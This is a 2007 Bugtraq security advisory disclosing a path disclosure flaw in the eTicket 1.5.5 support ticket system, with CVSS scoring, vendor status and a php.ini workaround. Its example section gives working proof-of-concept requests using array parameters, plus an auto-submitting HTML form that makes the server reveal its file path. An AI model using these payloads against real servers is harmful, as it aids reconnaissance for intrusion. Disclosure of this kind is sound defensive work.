[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: eTicket version 1.5.5 Path Disclosure Vulnerability
From: securityresearch () netvigilance ! com
Date: 2007-06-27 21:04:15
Message-ID: 20070627210415.12041.qmail () securityfocus ! com
[Download RAW message or body]
netVigilance Security Advisory #30
eTicket version 1.5.5 Path Disclosure Vulnerability
Description:
eTicket is an electronic (open source) support ticket system based on osTicket, that \
can receive tickets via email (pop3 or pipe) and a web-based form, as well as manage \
them using a web interface. External References:
Mitre CVE: CVE-2007-2800
NVD NIST: CVE-2007-2800
OSVDB: 34785
Summary:
eTicket is an electronic (open source) support ticket system based on osTicket.
A security problem in the product allows attackers to gather the true path of the \
server-side script.
Advisory URL:
http://www.netvigilance.com/advisory0030
Release Date:
06/27/2007
Severity:
Risk: Low
CVSS Metrics:
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
Vulnerability Impact: Attack
Host Impact: Path disclosure
SecureScout Testcase ID:
TC 17960
Vulnerable Systems:
eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable)
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings.
Vendor:
HM2K
Vendor Status:
HM 2K from eTicket got the Draft advisory on 21 May 2007 and got extensive support in \
how to fix the security problems on 23 May 2007 and 28 May 2007. In HM 2K's own words \
HM 2K "lost interest" and HM 2K "seriously found it too difficult to orchestrate what \
you [netVigilance] were asking from me [HM 2K], so I just did what I thought was \
best.". netVigilance's tests show that version 1.5.5.1 is also vulnerable. There \
currently is no official fix for this advisory.
Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = \
Off.
Example:
REQUEST:
http://[TARGET]/[PRODUCT FOLDER]/index.php?name[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?email[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?phone[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?subject[]=1
OR (available for version 1.5.5 and also for new version 1.5.5.1)
Make file (example.html) with the next content:
"
<html>
<body onLoad="document.forms(0).submit();">
<form action="http://[TARGET]/[PRODUCT FOLDER]/index.php" method="POST">
<input type="hidden" name="name[]" value="1">
<input type="hidden" name="email[]" value="1">
<input type="hidden" name="phone[]" value="1">
<input type="hidden" name="subject[]" value="1">
</form>
</body>
</html>
"
Then load it in any web browser.
REPLY:
<b>Warning</b>: htmlspecialchars() expects parameter 1 to be string, array given in \
<b>[DISCLOSED PATH][PRODUCT FOLDER]\inc\open_form.php</b> on line <b>[18 OR 26 OR 31 \
OR 51 OR 55]</b><br />
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic